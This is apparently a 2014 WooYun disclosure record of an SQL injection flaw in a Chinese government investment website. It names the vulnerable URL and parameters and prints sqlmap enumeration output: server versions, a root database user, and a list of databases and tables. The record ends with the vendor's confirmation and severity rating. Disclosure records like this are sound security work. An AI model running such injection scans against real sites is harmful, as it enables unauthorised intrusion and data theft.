WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
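2014-07-04: Details reported to the vendor; awaiting vendor response
2014-07-04: Vendor confirmed; details disclosed to the vendor only
2014-07-14: Details disclosed to core white hats and experts in related fields
2014-07-24: Details disclosed to regular white hats
2014-08-03: Details disclosed to intern white hats
2014-08-18: Details disclosed to the public
Invest Huadu website: http://www.investhuadu.gov.cn/topic.php?channelID=1&topicID=1
Fed it to sqlmap: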
web application technology: PHP 5.2.2, Apache 2.2.4
back-end DBMS: MySQL 5.0
banner: '5.0.41-community-log'
current user: 'root@%'
current database: 'db_investhuadu'
Databases:
available databases [5]:
[*] db_investhuadu
[*] db_investhuadu_temp
[*] information_schema
[*] mysql
[*] test
Database: db_investhuadu
[55 tables]
+----------------------------------+
| cms_admintopic                   |
| cms_bmlm                         |
| cms_business                     |
| cms_case                         |
| cms_channel                      |
| cms_download                     |
| cms_ebook                        |
| cms_ebook_copy                   |
| cms_form                         |
| cms_functions                    |
| cms_group                        |
| cms_guanfangtj                   |
| cms_guanfangtj_review            |
| cms_guestbook                    |
| cms_homelogo                     |
| cms_info                         |
| cms_info_backup_zuixingonggao_46 |
| cms_jishuzx                      |
| cms_jishuzx_review               |
| cms_mem_bmfgs                    |
| cms_mem_group                    |
| cms_mem_user                     |
| cms_message                      |
| cms_news                         |
| cms_news_copy                    |
| cms_news_review                  |
| cms_orderfield                   |
| cms_orderform                    |
| cms_orderform2                   |
| cms_orderlist                    |
| cms_ordertext                    |
| cms_pic_list                     |
| cms_pic_type                     |
| cms_product                      |
| cms_qiyejs                       |
| cms_qiyejs_review                |
| cms_question                     |
| cms_session                      |
| cms_setting                      |
| cms_subject                      |
| cms_topic                        |
| cms_tupian                       |
| cms_tupian_review                |
| cms_tupian_tp                    |
| cms_type                         |
| cms_user                         |
| cms_userlog                      |
| cms_video_list                   |
| cms_vote                         |
| cms_website                      |
| cms_xiangmuzx                    |
| cms_xiangmuzx_review             |
| cms_zijinzx                      |
| cms_zijinzx_review               |
| cms_ztdown                       |
+----------------------------------+
http://www.investhuadu.gov.cn/topic.php?channelID=1&topicID=1
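Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-07-04 17:46
Thank you very much for your report. The issue in the report has been confirmed and reproduced. It is a typical SQL injection vulnerability that can be exploited further and poses a high risk. Data affected: Medium. Attack cost: Low. Impact: Medium. Overall rating: Medium, rank: 10. We are contacting the organization that administers the website to have it handled.
None yet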